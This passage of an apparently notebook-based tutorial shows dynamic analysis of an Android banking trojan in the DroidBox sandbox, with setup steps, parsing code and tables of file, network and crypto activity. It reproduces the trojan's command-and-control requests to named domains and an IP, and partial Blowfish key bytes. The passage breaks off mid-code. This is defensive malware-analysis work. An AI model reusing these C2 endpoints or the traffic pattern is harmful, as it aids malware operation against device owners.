Android Dynamic Code Analysis - Mastering DroidBox

In this article I’ll take a closer look at DroidBox, which provides a mobile sandbox for examining Android applications. In the previous post I dealt with static code analysis. This time we’ll actually run the malicious application and look at the “noise” it generates, namely:

file system access
network activity
interaction with the operating system
interaction with other applications
etc.

DroidBox is easy to use. It ships its own system image and kernel, built to log the activities of a single application. DroidBox watches adb logcat for certain debug messages and collects everything related to the monitored app. However, the logged data isn’t always complete. Sometimes you only get a stripped version of the data that caused the activity, which makes it almost impossible to take a deep look at, for example, the network traffic (especially HTTP): with data missing you can’t reconstruct a full request-response sequence. Nevertheless, you can use DroidBox to get an overview of the malicious activities triggered by the app. For a more technical analysis of the data you’ll need additional tools (more to come in future posts).
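To give an idea of what "looking for certain debug messages" in logcat output can mean, here is a minimal sketch (Python 3). It assumes the log lines arrive in logcat's "brief" format (`<priority>/<tag>(<pid>): <message>`). The helper name `messages_for_tag` and the sample lines are made up for illustration and are not taken from DroidBox's own scripts or from a real run.

```python
import re

# Brief logcat format: "<priority>/<tag>(<pid>): <message>"
LOGCAT_BRIEF = re.compile(
    r"^(?P<prio>[VDIWEF])/(?P<tag>[^(]+?)\s*\(\s*(?P<pid>\d+)\):\s?(?P<msg>.*)$"
)

def messages_for_tag(lines, tag="DroidBox"):
    """Yield (pid, message) for every log line that carries the given tag."""
    for line in lines:
        match = LOGCAT_BRIEF.match(line.rstrip("\n"))
        if match and match.group("tag") == tag:
            yield int(match.group("pid")), match.group("msg")

# Hypothetical sample lines, NOT real DroidBox output
sample = [
    "I/ActivityManager(  148): Start proc com.example.app",
    'W/DroidBox( 1184): {"hypothetical": "payload"}',
    "W/dalvikvm( 1184): threadid=1: some warning",
]

hits = list(messages_for_tag(sample))
print(hits)
```

Only the line tagged `DroidBox` survives the filter. Everything else in the log stream is ignored, which is also why anything the sandbox does not log explicitly never shows up in the results.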

Requirements for DroidBox

First you’ll have to install the requirements DroidBox needs. Make sure the relevant system packages are installed:

root@kali:~# apt-get install python-virtualenv libatlas-dev liblapack-dev libblas-dev

You’ll need those in order to use scipy, matplotlib and numpy along with DroidBox. Now create a virtual environment and install the Python dependencies:

root@kali:~/work/apk# mkdir env
root@kali:~/work/apk# virtualenv env
...
root@kali:~/work/apk# source env/bin/activate
(env)root@kali:~/work/apk# pip install numpy scipy matplotlib

Install DroidBox

Download the package:

(env)root@kali:~/work/apk# wget https://droidbox.googlecode.com/files/DroidBox411RC.tar.gz

Setup PATH

import os
import sys

# Setup new PATH
old_path = os.environ['PATH']
new_path = old_path + ":" + "/root/work/apk/SDK/android-sdk-linux/tools:/root/work/apk/SDK/android-sdk-linux/platform-tools:/root/work/apk/SDK/android-sdk-linux/build-tools/19.1.0"
os.environ['PATH'] = new_path

# Change working directory
os.chdir("/root/work/apk/DroidBox_4.1.1/")

Setup IPython settings

%pylab inline
import binascii
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import networkx as nx
import datetime as dt
import datetime  # later cells call datetime.timedelta directly
import time
import ipy_table
from IPython.display import display_pretty, display_html, display_jpeg, display_png, display_json, display_latex, display_svg
from IPython.display import HTML
from IPython.core.magic import register_cell_magic, Magics, magics_class, cell_magic
import jinja2

# pandas display settings
pd.set_option('display.height', 1000)
pd.set_option('display.max_rows', 500)
pd.set_option('display.max_columns', 500)
pd.set_option('display.max_colwidth', 100)
pd.set_option('display.width', 1000)
pd.set_option('display.column_space', 1000)

Populating the interactive namespace from numpy and matplotlib
height has been deprecated.

External extensions

# Install
%install_ext https://raw.githubusercontent.com/dorneanu/ipython/master/extensions/diagmagic.py
    
# Then load extensions
%load_ext diagmagic

Installed diagmagic.py. To use it, type:
  %load_ext diagmagic

Utilities

from IPython import display
from IPython.core.magic import register_cell_magic, Magics, magics_class, cell_magic
import jinja2

# <!-- collapse=True -->
def df2table(df):
    """ Outputs a DataFrame as a table using ipy_table """
    entries = [list(i) for i in df.itertuples()]
    
    # Extract table header
    header = list(df.columns)
    
    # Add index to header
    header.insert(0, df.index.name)
    
    # Insert header at 1st place
    entries.insert(0, header)

    return ipy_table.make_table(entries)

# Create jinja cell magic (http://nbviewer.ipython.org/urls/gist.github.com/bj0/5343292/raw/23a0845ee874827e3635edb0bf5701710a537bfc/jinja2.ipynb)
@magics_class
class JinjaMagics(Magics):
    '''Magics class containing the jinja2 magic and state'''
    
    def __init__(self, shell):
        super(JinjaMagics, self).__init__(shell)
        
        # create a jinja2 environment to use for rendering
        # this can be modified for desired effects (ie: using different variable syntax)
        self.env = jinja2.Environment(loader=jinja2.FileSystemLoader('.'))
        
        # possible output types
        self.display_functions = dict(html=display.HTML, 
                                      latex=display.Latex,
                                      json=display.JSON,
                                      pretty=display.Pretty,
                                      display=display.display)

    
    @cell_magic
    def jinja(self, line, cell):
        '''
        jinja2 cell magic function.  Contents of cell are rendered by jinja2, and 
        the line can be used to specify output type.

        ie: "%%jinja html" will return the rendered cell wrapped in an HTML object.
        '''
        f = self.display_functions.get(line.lower().strip(), display.display)
        
        tmp = self.env.from_string(cell)
        rend = tmp.render(dict((k,v) for (k,v) in self.shell.user_ns.items() 
                                        if not k.startswith('_') and k not in self.shell.user_ns_hidden))
        
        return f(rend)
        
    
ip = get_ipython()
ip.register_magics(JinjaMagics)

Create Android Virtual Device (AVD)

Now you’ll have to create a virtual Android device in order to analyze the APK. Assuming you installed the SDK in the previous step, you should now have some targets available on your machine. If not (as in my case), make sure you have an X session running and run android from the console. In my case I fired up VNC and connected to the Kali machine.

This is what I’ve got:

%%bash
android list targets | head -n 10

Available Android targets:
----------
id: 1 or "android-16"
     Name: Android 4.1.2
     Type: Platform
     API level: 16
     Revision: 4
     Skins: WXGA800-7in, WQVGA400, WVGA800 (default), WXGA800, HVGA, WSVGA, WVGA854, WQVGA432, WXGA720, QVGA
 Tag/ABIs : default/armeabi-v7a
----------

Now we create the AVD using the following command:

# android create avd --abi default/armeabi-v7a -n android-4.1.2-droidbox -t 1 -c 1000M
Android 4.1.2 is a basic Android platform.
Do you wish to create a custom hardware profile [no]
Created AVD 'android-4.1.2-droidbox' based on Android 4.1.2, ARM (armeabi-v7a) processor,
with the following hardware config:
hw.lcd.density=240
hw.ramSize=512
hw.sdCard=yes
vm.heapSize=48

%%bash
android list avd

Available Android Virtual Devices:
    Name: android-4.1.2-droidbox
    Path: /root/.android/avd/android-4.1.2-droidbox.avd
  Target: Android 4.1.2 (API level 16)
 Tag/ABI: default/armeabi-v7a
    Skin: WVGA800
  Sdcard: 1000M

Start the emulator

In DroidBox’s package directory you’ll find startemu.sh. Open it and add your favourite parameters.

%%bash
cat startemu.sh

#!/usr/bin/env bash

emulator -avd $1 -system images/system.img -ramdisk images/ramdisk.img -wipe-data -prop dalvik.vm.execution-mode=int:portable &

Afterwards make sure you have an X session and run the emulator with your previously created AVD:

(env)root@kali:~/work/apk/DroidBox# ./startemu.sh android-4.1.2-droidbox
...

Now you should see your emulator booting …

Run DroidBox

!./droidbox.sh /root/work/apk/DroidBox_4.1.1/APK/FakeBanker.apk

 ____                        __  ____
/\  _`\               __    /\ \/\  _`\
\ \ \/\ \  _ __  ___ /\_\   \_\ \ \ \L\ \   ___   __  _
 \ \ \ \ \/\`'__\ __`\/\ \  /'_` \ \  _ <' / __`\/\ \/'\
  \ \ \_\ \ \ \/\ \L\ \ \ \/\ \L\ \ \ \L\ \ \L\ \/>  </
   \ \____/\ \_\ \____/\ \_\ \___,_\ \____/ \____//\_/\_\
    \/___/  \/_/\/___/  \/_/\/__,_ /\/___/ \/___/ \//\/_/
Waiting for the device...
Installing the application /root/work/apk/DroidBox_4.1.1/APK/FakeBanker.apk...
Running the component com.gmail.xpack/com.gmail.xpack.MainActivity...
Starting the activity com.gmail.xpack.MainActivity...
Application started
Analyzing the application during infinite time seconds...
^C

DroidBox will then listen for activities until you stop it with ^C.

Meanwhile I interacted with the app and saw that DroidBox was collecting logs during the interactions. DroidBox outputs its results as a JSON file. I’ve uploaded the results to pastebin.com. Now let’s have some fun and take a look at them.

Before analyzing the output, keep in mind that:

[…] all data received/sent, read/written are shown in hexadecimal since the handled data can contain binary data.

(Source: https://github.com/floe/mobile-sandbox/blob/master/DroidBox_4.1.1/scripts/droidbox.py)
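Since every payload arrives hex-encoded, decoding is the first step for any field you want to read. Below is a minimal sketch (Python 3) of that step. The helper name `decode_hex_field` is my own, and the sample value is simply the request line seen later in this post, hex-encoded on the spot for the demonstration.

```python
import binascii

def decode_hex_field(hex_string):
    """Turn a hex-encoded payload into text; undecodable bytes become U+FFFD."""
    raw = binascii.unhexlify(hex_string)
    return raw.decode("utf-8", errors="replace")

# Build a sample hex string from a known request line (illustration only)
example = binascii.hexlify(b"POST /images/1.php HTTP/1.1\r\n").decode("ascii")
decoded = decode_hex_field(example)

print(example[:16])   # 504f5354202f696d
print(repr(decoded))  # 'POST /images/1.php HTTP/1.1\r\n'
```

Decoding with `errors="replace"` keeps the helper from failing on binary content such as the bytes read from /dev/urandom. If you need the exact bytes, keep the result of `unhexlify` instead.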

Results analysis

First let’s download the data and let Python parse it:

# <!-- collapse=True -->
import json
import urllib
url = "http://pastebin.com/raw.php?i=7YSb3EMW"

# Load data
jsonurl = urllib.urlopen(url)
result = json.loads(jsonurl.read())

# Show dictionary keys
result.keys()

[u'apkName',
 u'enfperm',
 u'opennet',
 u'cryptousage',
 u'sendsms',
 u'servicestart',
 u'sendnet',
 u'closenet',
 u'accessedfiles',
 u'fdaccess',
 u'dataleaks',
 u'recvnet',
 u'dexclass',
 u'hashes',
 u'recvsaction',
 u'phonecalls']

So we have different categories of activities we can look at. After analyzing the JSON content, I consider the following activities the most important.
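The cells in the following sections all repeat the same steps: take one category, convert its timestamp keys into readable time deltas and sort the entries. As a sketch of that pattern without pandas (Python 3), here is a small helper. It assumes each category maps a timestamp string (seconds as a float) to a dict of fields, which is what the notebook code relies on. The name `category_rows` and the miniature `demo` dictionary, including its timestamp keys, are hypothetical.

```python
import datetime

def category_rows(result, category):
    """Return the entries of one category, sorted by numeric timestamp."""
    rows = []
    for ts, entry in result.get(category, {}).items():
        seconds = float(ts)
        row = dict(entry)
        row["Timestamp"] = str(datetime.timedelta(seconds=round(seconds)))
        rows.append((seconds, row))
    # Sort on the numeric value, not on the formatted string
    rows.sort(key=lambda pair: pair[0])
    return [row for _, row in rows]

# Hypothetical miniature result, shaped like the 'opennet' category
demo = {
    "opennet": {
        "906.1": {"desthost": "80.74.128.17", "destport": "80", "fd": "23"},
        "8.2": {"desthost": "80.74.128.17", "destport": "80", "fd": "17"},
    }
}

rows = category_rows(demo, "opennet")
for row in rows:
    print(row["Timestamp"], row["desthost"], row["fd"])
```

Sorting on the numeric timestamp avoids a subtle issue with sorting the formatted strings: lexicographically "10:00:00" comes before "9:00:00". For a run of a few minutes, as in this post, both approaches give the same order.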

File system activities

Let’s have a look at the file system access actions triggered by the application. Due to DroidBox limitations I couldn’t have a look at the complete raw data.

# <!-- collapse=True -->
# Convert timestamps to human readable time delta
timestamps = [str(datetime.timedelta(seconds=(round(float(i.encode("utf-8")))))) for i in result['fdaccess'].keys()]

# Create list of accessed files entries
accessed_files = [i[1] for i in result['fdaccess'].items()]

# Create dataframe
df_accessedfiles = pd.DataFrame(accessed_files, index=timestamps)
df_accessedfiles.sort(inplace=True)
df_accessedfiles.index.name='Timestamp'

# Unhexlify data
unhexed_data = [binascii.unhexlify(d) for d in df_accessedfiles['data']]
df_accessedfiles['rawdata'] = unhexed_data

df2table(df_accessedfiles[['operation', 'path', 'rawdata']].reset_index())
#ipy_table.apply_theme('basic')
df_accessedfiles[['operation', 'path', 'rawdata']].reset_index()

	Timestamp	operation	path	rawdata
0	0:00:03	read	/data/data/com.gmail.xpack/shared_prefs/MainPref.xml	<?xml version='1.0' encoding='utf-8' standalone='yes' ?>\n<map>\n<string name="DOWNLOADDOMAIN">c...
1	0:00:04	read	/proc/1184/cmdline	com.gmail.xpack��p/FakeBanker.apk�ain...
2	0:00:04	read	/proc/1197/cmdline	logcat�DroidBox:W�dalvikvm:W�ActivityManager:I��p/FakeBanker.apk�ain...
3	0:00:08	read	/data/data/com.gmail.xpack/shared_prefs/MainPref.xml	<?xml version='1.0' encoding='utf-8' standalone='yes' ?>\n<map>\n<string name="DOWNLOADDOMAIN">c...
4	0:00:09	write	/data/data/com.gmail.xpack/shared_prefs/MainPref.xml	<?xml version='1.0' encoding='utf-8' standalone='yes' ?>\n<map>\n<string name="DOWNLOADDOMAIN">c...
5	0:00:10	write	/data/data/com.gmail.xpack/shared_prefs/MainPref.xml	<?xml version='1.0' encoding='utf-8' standalone='yes' ?>\n<map>\n<string name="DOWNLOADDOMAIN">c...
6	0:00:10	read	/proc/1205/cmdline	com.gmail.xpack:remote��p/FakeBanker.apk�ain...
7	0:00:36	write	/data/data/com.gmail.xpack/shared_prefs/MainPref.xml	<?xml version='1.0' encoding='utf-8' standalone='yes' ?>\n<map>\n<int name="PASSADDED" value="10...
8	0:00:36	read	/data/data/com.gmail.xpack/shared_prefs/MainPref.xml	<?xml version='1.0' encoding='utf-8' standalone='yes' ?>\n<map>\n<string name="DOWNLOADDOMAIN">c...
9	0:01:05	read	/data/data/com.gmail.xpack/shared_prefs/MainPref.xml	<?xml version='1.0' encoding='utf-8' standalone='yes' ?>\n<map>\n<int name="PASSADDED" value="10...
10	0:15:06	write	/data/data/com.gmail.xpack/shared_prefs/MainPref.xml	<?xml version='1.0' encoding='utf-8' standalone='yes' ?>\n<map>\n<int name="PASSADDED" value="10...
11	0:15:06	write	/data/data/com.gmail.xpack/shared_prefs/MainPref.xml	<?xml version='1.0' encoding='utf-8' standalone='yes' ?>\n<map>\n<int name="PASSADDED" value="10...
12	0:15:24	read	/dev/urandom	E0��2qV��4!=�Nd��V
13	0:15:27	read	/proc/1239/cmdline	com.android.exchange��p/FakeBanker.apk�ain...
14	0:15:35	read	/data/data/com.gmail.xpack/shared_prefs/MainPref.xml	<?xml version='1.0' encoding='utf-8' standalone='yes' ?>\n<map>\n<int name="PASSADDED" value="10...
15	0:15:37	write	/data/data/com.gmail.xpack/shared_prefs/MainPref.xml	<?xml version='1.0' encoding='utf-8' standalone='yes' ?>\n<map>\n<int name="PASSADDED" value="10...
16	0:15:37	write	/data/data/com.gmail.xpack/shared_prefs/MainPref.xml	<?xml version='1.0' encoding='utf-8' standalone='yes' ?>\n<map>\n<int name="PASSADDED" value="10...
17	0:15:58	read	/data/data/com.gmail.xpack/shared_prefs/MainPref.xml	<?xml version='1.0' encoding='utf-8' standalone='yes' ?>\n<map>\n<int name="PASSADDED" value="10...
18	0:16:00	write	/data/data/com.gmail.xpack/shared_prefs/MainPref.xml	<?xml version='1.0' encoding='utf-8' standalone='yes' ?>\n<map>\n<int name="PASSADDED" value="10...
19	0:16:01	write	/data/data/com.gmail.xpack/shared_prefs/MainPref.xml	<?xml version='1.0' encoding='utf-8' standalone='yes' ?>\n<map>\n<int name="PASSADDED" value="10...
20	0:16:10	read	/proc/wakelocks	name\tcount\texpire_count\twake_count\tactive_since\ttotal_time\tsleep_time\tmax_time\tlast_chan...

Network activities

Opened connections (opennet)

# <!-- collapse=True -->
# Convert timestamps to human readable time delta
timestamps = [str(datetime.timedelta(seconds=(round(float(i.encode("utf-8")))))) for i in result['opennet'].keys()]

# Create list of opened connection entries
open_net = [i[1] for i in result['opennet'].items()]

# Create dataframe
df_opennet = pd.DataFrame(open_net, index=timestamps)
df_opennet.sort(inplace=True)
df_opennet.index.name='Timestamp'


#df2table(df_opennet)
#ipy_table.apply_theme('basic')
df_opennet.reset_index()

	Timestamp	desthost	destport	fd
0	0:00:08	80.74.128.17	80	17
1	0:15:06	80.74.128.17	80	23
2	0:15:36	80.74.128.17	80	28
3	0:16:00	80.74.128.17	80	33

Sent data (sendnet)

Here you can have a look at the sent data. Again, the POST/GET requests are not complete.

# <!-- collapse=True -->
# Convert timestamps to human readable time delta
timestamps = [str(datetime.timedelta(seconds=(round(float(i.encode("utf-8")))))) for i in result['sendnet'].keys()]
# Create list of sent data entries
send_net = [i[1] for i in result['sendnet'].items()]

# Create dataframe
df_sendnet = pd.DataFrame(send_net, index=timestamps)
df_sendnet.sort(inplace=True)
df_sendnet.index.name='Timestamp'

# Unhexlify data
unhexed_data = [binascii.unhexlify(d) for d in df_sendnet['data']]
df_sendnet['rawdata'] = unhexed_data

#df2table(df_sendnet[['desthost', 'destport', 'fd', 'operation', 'type', 'rawdata']])
#ipy_table.apply_theme('basic')
df_sendnet[['desthost', 'destport', 'fd', 'operation', 'type', 'rawdata']].reset_index()

	Timestamp	desthost	destport	fd	operation	type	rawdata
0	0:00:08	80.74.128.17	80	17	send	net write	POST /images/1.php HTTP/1.1\r\nUser-agent: Mozilla/4.76 (Java; U;Linux armv7l 2.6.29-gc497e41; r...
1	0:15:06	80.74.128.17	80	23	send	net write	POST /images/1.php HTTP/1.1\r\nUser-agent: Mozilla/4.76 (Java; U;Linux armv7l 2.6.29-gc497e41; r...
2	0:15:36	80.74.128.17	80	28	send	net write	POST /images/1.php HTTP/1.1\r\nUser-agent: Mozilla/4.76 (Java; U;Linux armv7l 2.6.29-gc497e41; r...
3	0:16:00	80.74.128.17	80	33	send	net write	POST /images/1.php HTTP/1.1\r\nUser-agent: Mozilla/4.76 (Java; U;Linux armv7l 2.6.29-gc497e41; r...

Received data (recvnet)

# <!-- collapse=True -->
# Convert timestamps to human readable time delta
timestamps = [str(datetime.timedelta(seconds=(round(float(i.encode("utf-8")))))) for i in result['recvnet'].keys()]

# Create list of received data entries
recv_net = [i[1] for i in result['recvnet'].items()]

# Create dataframe
df_recvnet = pd.DataFrame(recv_net, index=timestamps)
df_recvnet.sort(inplace=True)
df_recvnet.index.name='Timestamp'

# Unhexlify data
unhexed_data = [binascii.unhexlify(d) for d in df_recvnet['data']]
df_recvnet['rawdata'] = unhexed_data

#df2table(df_recvnet[['host', 'port', 'type', 'rawdata']])
#ipy_table.apply_theme('basic')
df_recvnet[['host', 'port', 'type', 'rawdata']].reset_index()

	Timestamp	host	port	type	rawdata
0	0:00:08	80.74.128.17	80	net read	HTTP/1.1 406 Not Acceptable\r\nDate: Mon, 28 Jul 2014 13:29:38 GMT\r\nServer: Apache\r\nContent-...
1	0:00:08	80.74.128.17	80	net read	x=10\r\nConnection: Keep-Alive\r\nContent-Type: text/html; charset=iso-8859-1\r\n\r\n<!DOCTYPE H...
2	0:15:06	80.74.128.17	80	net read	x=10\r\nConnection: Keep-Alive\r\nContent-Type: text/html; charset=iso-8859-1\r\n\r\n<!DOCTYPE H...
3	0:15:06	80.74.128.17	80	net read	HTTP/1.1 406 Not Acceptable\r\nDate: Mon, 28 Jul 2014 13:44:36 GMT\r\nServer: Apache\r\nContent-...
4	0:15:36	80.74.128.17	80	net read	HTTP/1.1 406 Not Acceptable\r\nDate: Mon, 28 Jul 2014 13:45:06 GMT\r\nServer: Apache\r\nContent-...
5	0:15:36	80.74.128.17	80	net read	x=10\r\nConnection: Keep-Alive\r\nContent-Type: text/html; charset=iso-8859-1\r\n\r\n<!DOCTYPE H...
6	0:16:00	80.74.128.17	80	net read	HTTP/1.1 406 Not Acceptable\r\nDate: Mon, 28 Jul 2014 13:45:30 GMT\r\nServer: Apache\r\nContent-...
7	0:16:00	80.74.128.17	80	net read	x=10\r\nConnection: Keep-Alive\r\nContent-Type: text/html; charset=iso-8859-1\r\n\r\n<!DOCTYPE H...
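The received data comes in fragments, and only some of them start with an HTTP status line. As a rough sketch (Python 3), the status can be pulled out of those fragments like this. The helper name `parse_status` is my own, and the two fragments are shortened copies of the first two rows above, cut at a complete header line.

```python
import re

# Matches e.g. "HTTP/1.1 406 Not Acceptable" at the start of a fragment
STATUS_LINE = re.compile(r"^HTTP/(\d\.\d) (\d{3}) ([^\r\n]*)")

def parse_status(fragment):
    """Return (code, reason) if the fragment starts with a status line, else None."""
    match = STATUS_LINE.match(fragment)
    if match is None:
        return None
    return int(match.group(2)), match.group(3)

fragments = [
    "HTTP/1.1 406 Not Acceptable\r\nDate: Mon, 28 Jul 2014 13:29:38 GMT\r\nServer: Apache\r\n",
    "x=10\r\nConnection: Keep-Alive\r\n",
]

statuses = [parse_status(f) for f in fragments]
print(statuses)  # [(406, 'Not Acceptable'), None]
```

Fragments that begin in the middle of the headers, like the second one, yield `None`. They would have to be stitched to their predecessor before anything more can be parsed from them.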

Requests sequence

Since I was not able to get the full contents of the POST/GET requests (and their corresponding responses), I had to rely on the information found here. Below is a short sequence diagram describing the general communication process. Keep in mind that the sequence only tries to give you a short overview of the data exchange between the process and the web server.

%%seqdiag
# <!-- collapse=True -->
seqdiag {
  application  -> citroen-club.ch [label = "POST /images/1.php HTTP/1.1"];
  application <-- citroen-club.ch [label = "HTTP/1.1 406 Not Acceptable", leftnote= ""];
  application --> best-invest-int.com [label = "POST /gallery/3.php HTTP/1.1", note = "POST data=U2ltU3RhdGUgPSBOT1QgUkVBRFkgCg%3D%3D%0A&rid=25"];
  application <-- best-invest-int.com [label = "HTTP/1.1 403 Forbidden"];
  application --> best-invest-int.com [label = "POST /gallery/4.php HTTP/1.1", note = "POST data=U2ltU3RhdGUgPSBOT1QgUkVBRFkgCg%3D%3D%0A&LogCode=CONF&LogText=Get+config+data+from+server"];
  application <-- best-invest-int.com [label = "HTTP/1.1 403 Forbidden"];
  application --> best-invest-int.com [label = "POST /gallery/4.php HTTP/1.1", note = "POST data=U2ltU3RhdGUgPSBOT1QgUkVBRFkgCg%3D%3D%0A&LogCode=DATA&LogText=Send+data+to+server&"];
  application <-- best-invest-int.com [label = "..."];
}

And now a complete request/response pair:

Request:

POST /gallery/4.php HTTP/1.1
User-agent: Mozilla/4.76 (Java; U;Linux i686 3.0.36-android-x86-eeepc+; ru; The Android Project 0)
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Pragma: no-cache
Host: best-invest-int.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 86
Data Raw: 64 61 74 61 3d 55 32 6c 74 55 33 52 68 64 47 55 67 50 53 42 4f 54 31 51 67 55 6b 56 42 52 46 6b 67 43 67 25 33 44 25 33 44 25 30 41 26 4c 6f 67 43 6f 64 65 3d 43 4f 4e 46 26 4c 6f 67 54 65 78 74 3d 43 68 65 63 6b 2b 70 75 6c 6c 2b 6f 66 66 2b 75 72 6c 73 26 
Data Ascii: data=U2ltU3RhdGUgPSBOT1QgUkVBRFkgCg%3D%3D%0A&LogCode=CONF&LogText=Check+pull+off+urls&

Response:

HTTP/1.1 403 Forbidden
Date: Thu, 21 Nov 2013 12:37:26 GMT
Server: Apache/2.2.3 (CentOS)
Content-Length: 299
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /gallery/4.php on this server.</p><hr><address>Apache/2.2.3 (CentOS) Server at best-invest-int.com Port 80</address></body></html>
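The `data` parameter in the request body looks like URL-encoded Base64. A minimal sketch (Python 3, standard library only) to check that assumption on the "Data Ascii" line shown above:

```python
import base64
from urllib.parse import parse_qs

# Request body copied from the "Data Ascii" line of the request above
body = ("data=U2ltU3RhdGUgPSBOT1QgUkVBRFkgCg%3D%3D%0A"
        "&LogCode=CONF&LogText=Check+pull+off+urls&")

# parse_qs undoes the URL encoding (%3D -> "=", %0A -> newline, "+" -> space)
fields = parse_qs(body)

# The default (non-validating) Base64 decoder skips the trailing newline
decoded = base64.b64decode(fields["data"][0]).decode("ascii")

print(fields["LogCode"], fields["LogText"])
print(repr(decoded))  # 'SimState = NOT READY \n'
```

So at least this field is not encrypted, only encoded. It carries the SIM state of the device, which is "NOT READY" here, as you would expect for a run inside an emulator.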

Crypto activities

# <!-- collapse=True -->
# Convert timestamps to human readable time delta
timestamps = [str(datetime.timedelta(seconds=(round(float(i.encode("utf-8")))))) for i in result['cryptousage'].keys()]

# Create list of crypto usage entries
crypto_usage = [i[1] for i in result['cryptousage'].items()]

# Create dataframe
df_cryptousage = pd.DataFrame(crypto_usage, index=timestamps)
df_cryptousage.sort(inplace=True)
df_cryptousage.index.name='Timestamp'

# Unhexlify data
#unhexed_data = [binascii.unhexlify(d) for d in df_recvnet['data']]
#df_recvnet['rawdata'] = unhexed_data

#df_recvnet[['host', 'port', 'type', 'rawdata']]
df_cryptousage.reset_index()

	Timestamp	algorithm	key	operation	type
0	0:00:09	Blowfish	52, 101, 54, 54, 55, 54, 54, 101, 54, 98, 54, 97, 54, 99, 54, 101, 55, 54, 54, 98, 54, 97, 52, 9...	keyalgo	crypto
1	0:15:06	Blowfish	52, 101, 54, 54, 55, 54, 54, 101, 54, 98, 54, 97, 54, 99, 54, 101, 55, 54, 54, 98, 54, 97, 52, 9...	keyalgo	crypto
2	0:15:36	Blowfish	52, 101, 54, 54, 55, 54, 54, 101, 54, 98, 54, 97, 54, 99, 54, 101, 55, 54, 54, 98, 54, 97, 52, 9...	keyalgo	crypto
3	0:16:00	Blowfish	52, 101, 54, 54, 55, 54, 54, 101, 54, 98, 54, 97, 54, 99, 54, 101, 55, 54, 54, 98, 54, 97, 52, 9...	keyalgo	crypto
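The key column is a list of decimal byte values. As a quick sketch (Python 3), the visible part can be turned back into bytes. Only the values that are completely visible in the table are used here. The rest of the key is cut off in the output and is deliberately not guessed.

```python
# Values copied from the (truncated) key column above
visible = ("52, 101, 54, 54, 55, 54, 54, 101, 54, 98, 54, "
           "97, 54, 99, 54, 101, 55, 54, 54, 98, 54, 97")

key_bytes = bytes(int(value) for value in visible.split(","))
as_text = key_bytes.decode("ascii")
print(as_text)  # 4e66766e6b6a6c6e766b6a

# The text itself consists of hex digits, so decode it once more
inner = bytes.fromhex(as_text).decode("ascii")
print(inner)    # Nfvnkjlnvkj
```

The visible prefix therefore appears to be an ASCII hex string. Whether the app feeds the hex string itself or the decoded bytes into Blowfish, and how the key continues, cannot be told from this output alone.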

Activities chart

Now let’s look at the order in which the various activities took place. Below you’ll find a table containing the timestamp, operation and category of each activity (e.g. file system access, network read/write etc.).

# <!-- collapse=True -->
# Create df
df_activities = pd.DataFrame(columns=[['Timestamp', 'Operation', 'Category']])

# file system access
accessed_files = df_accessedfiles.reset_index()[[0,3]]
accessed_files['Category'] = "file system"
accessed_files.columns = ['Timestamp', 'Operation', 'Category']

# network activities
network_open = df_opennet.reset_index()[[0]]
network_open['Operation'] = 'net open'
network_open['Category'] = 'network'
network_open.columns = ['Timestamp', 'Operation', 'Category']

network_sent = df_sendnet.reset_index()[[0,6]]
network_sent['Category'] = "network"
network_sent.columns = ['Timestamp', 'Operation', 'Category']

network_recv = df_recvnet.reset_index()[[0,4]]
network_recv['Category'] = "network"
network_recv.columns = ['Timestamp', 'Operation', 'Category']

# crypto usage
crypto_usage = df_cryptousage.reset_index()[[0,1]]
crypto_usage['Category'] = "crypto"
crypto_usage.columns = ['Timestamp', 'Operation', 'Category']

# Merge data frames
df_activities = pd.concat([accessed_files, network_open, network_sent, network_recv, crypto_usage], ignore_index=True)
df_activities.sort('Timestamp', inplace=True)

# Convert to JSON
d = df_activities.to_json(orient='records')
json_data = json.dumps(json.loads(d), ensure_ascii=False).encode("utf-8")

df_activities

	Timestamp	Operation	Category
0	0:00:03	read	file system
1	0:00:04	read	file system
2	0:00:04	read	file system
3	0:00:08	read	file system
21	0:00:08	net open	network
25	0:00:08	net write	network
29	0:00:08	net read	network
30	0:00:08	net read	network
4	0:00:09	write	file system
37	0:00:09	Blowfish	crypto
5	0:00:10	write	file system
6	0:00:10	read	file system
7	0:00:36	write	file system
8	0:00:36	read	file system
9	0:01:05	read	file system
10	0:15:06	write	file system
11	0:15:06	write	file system
22	0:15:06	net open	network
26	0:15:06	net write	network
31	0:15:06	net read	network
32	0:15:06	net read	network
38	0:15:06	Blowfish	crypto
12	0:15:24	read	file system
13	0:15:27	read	file system
14	0:15:35	read	file system
23	0:15:36	net open	network
27	0:15:36	net write	network
33	0:15:36	net read	network
34	0:15:36	net read	network
39	0:15:36	Blowfish	crypto
15	0:15:37	write	file system
16	0:15:37	write	file system
17	0:15:58	read	file system
18	0:16:00	write	file system
24	0:16:00	net open	network
28	0:16:00	net write	network
35	0:16:00	net read	network
36	0:16:00	net read	network
40	0:16:00	Blowfish	crypto
19	0:16:01	write	file system
20	0:16:10	read	file system

A fancier overview …

%%jinja html
<!-- collapse=True -->
<html>
<head>
  <script src="http://d3js.org/d3.v3.min.js"></script>
  <script src="http://dimplejs.org/dist/dimple.v2.1.0.min.js"></script>
<title>{{ title }}</title>
</head>
<body>
<div id="bar_chart"></div>
  <script type="text/javascript">
    var json_data  = {{ json_data }};
    var svg = dimple.newSvg("#bar_chart", 800, 800);
    var myChart = new dimple.chart(svg, json_data);
    myChart.setBounds(150, 50, 700, 680)
    myChart.addCategoryAxis("x", ["Category", "Operation"]);
    myChart.addCategoryAxis("y", "Timestamp");
    myChart.addSeries("Operation", dimple.plot.bar);
    myChart.addLegend(170, 10, 630, 20, "right");
    myChart.draw();
  </script>
</body>
</html>

A few observations:

file system accesses (both reads and writes) take place throughout the whole run
the crypto routines are apparently involved whenever data is sent over or received from the Internet
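The second observation can be checked against the tables above. This minimal sketch (Python 3) takes the timestamps of the crypto events and of the opened connections and computes, for each crypto event, the distance in seconds to the nearest connection. The helper name `to_seconds` is my own. The timestamps are copied from the crypto and opennet tables.

```python
def to_seconds(stamp):
    """Convert an 'H:MM:SS' string into a number of seconds."""
    hours, minutes, seconds = (int(part) for part in stamp.split(":"))
    return hours * 3600 + minutes * 60 + seconds

# Timestamps copied from the cryptousage and opennet tables
crypto_events = ["0:00:09", "0:15:06", "0:15:36", "0:16:00"]
net_open_events = ["0:00:08", "0:15:06", "0:15:36", "0:16:00"]

gaps = [
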